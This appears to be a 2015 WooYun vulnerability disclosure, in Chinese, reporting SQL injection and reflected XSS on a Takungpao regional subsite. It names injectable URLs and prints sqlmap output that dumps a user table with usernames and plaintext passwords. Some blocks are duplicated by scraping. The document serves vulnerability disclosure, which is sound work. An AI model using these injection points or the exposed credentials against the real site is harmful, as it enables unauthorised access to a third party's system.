大公网某分站多处漏洞打包(xss/sql)

发表于 2015年07月22日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0128510

漏洞标题：大公网某分站多处漏洞打包(xss/sql)

漏洞详情

披露状态：

2015-07-22: 积极联系厂商并且等待厂商认领中，细节不对外公开
2015-09-05: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

关注时事新闻！

详细说明：

首先来第一发：

http://cq.takungpao.com/list.asp?classid=155

1	http://cq.takungpao.com/list.asp?classid=155

基于时间SQL盲注：

sqlmap跑下

Database: Microsoft_Access_masterdb<br>
[1 table]<br>
+----------+<br>
| tbl_user |<br>
+----------+

Database: Microsoft_Access_masterdb

[1 table]

+----------+

| tbl_user |

+----------+

最近网速不好，我就列了下重要的数据。

这网速我也是醉了，实在受不鸟。好吧，我就列了最后的。唔

Database: Microsoft_Access_masterdb<br>
Table: tbl_user<br>
[2 entries]<br>
+--------+------------------------------------------------------------------------------------------<br>
----------------------------------------------------------------------------------------------------<br>
-------------------------------------------------------------------+----------+---------+<br>
| userid | access| username | userpwd |<br>
+--------+------------------------------------------------------------------------------------------<br>
----------------------------------------------------------------------------------------------------<br>
-------------------------------------------------------------------+----------+---------+<br>
| 1      | 134, 135, 75, 270, 88, 22, 153, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 154,<br>
 156, 158, 160, 162, 122, 78, 264, 121, 71, 76, 258, 293, 294, 295, 296, 297, 269, 54, 51, 260, 261,<br>
 262, 263, 89, 146, 171, 172, 173, 271, 236, 237, 238, 239, 240, 2 | cq       | 123654  |<br>
| 2      | 75, 88, 22, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 122, 78, 264, 121, 71, 7<br>
6, 258, 269, 54, 51, 260, 261, 262, 263, 256, 257, 146, 32, 25, 139<br>
                                                                   | hy       | hy      |<br>
+--------+------------------------------------------------------------------------------------------<br>
--------------------------------------------------------------------------------

Database: Microsoft_Access_masterdb

Table: tbl_user

[2 entries]

+--------+------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------

-------------------------------------------------------------------+----------+---------+

+--------+------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------

-------------------------------------------------------------------+----------+---------+

| 1 | 134, 135, 75, 270, 88, 22, 153, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 154,

156, 158, 160, 162, 122, 78, 264, 121, 71, 76, 258, 293, 294, 295, 296, 297, 269, 54, 51, 260, 261,

262, 263, 89, 146, 171, 172, 173, 271, 236, 237, 238, 239, 240, 2 | cq | 123654 |

| 2 | 75, 88, 22, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 122, 78, 264, 121, 71, 7

6, 258, 269, 54, 51, 260, 261, 262, 263, 256, 257, 146, 32, 25, 139

| hy | hy |

+--------+------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------

就跑了这一点点。第二发：XSS漏洞（反射型）

漏洞证明：

Database: Microsoft_Access_masterdb<br>
[1 table]<br>
+----------+<br>
| tbl_user |<br>
+----------+

Database: Microsoft_Access_masterdb

[1 table]

+----------+

| tbl_user |

+----------+

最近网速不好，我就列了下重要的数据。

修复方案：

严格控制关键字。安全狗拦截

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

评价

2010-01-01 00:00 你大爷在此百无禁忌白帽子 | Rank:0 漏洞数:0)
<code>http://cq.takungpao.com/list.asp?classid=121</code> access库可注入出用户数据哥哥表示不服啊跟你重复了

原文连接：大公网某分站多处漏洞打包(xss/sql) 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。